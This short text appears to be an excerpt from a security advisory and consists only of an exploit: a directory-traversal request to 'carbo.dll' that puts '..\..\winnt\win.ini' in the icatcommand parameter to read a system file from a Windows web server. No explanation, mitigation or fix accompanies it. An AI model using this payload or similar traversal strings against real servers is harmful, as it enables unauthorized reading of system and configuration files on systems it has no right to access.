Exploit:

  To view their c:\winnt\win.ini:
  http://host/carbo.dll?icatcommand=..\..\winnt\win.ini&catalogname=catalog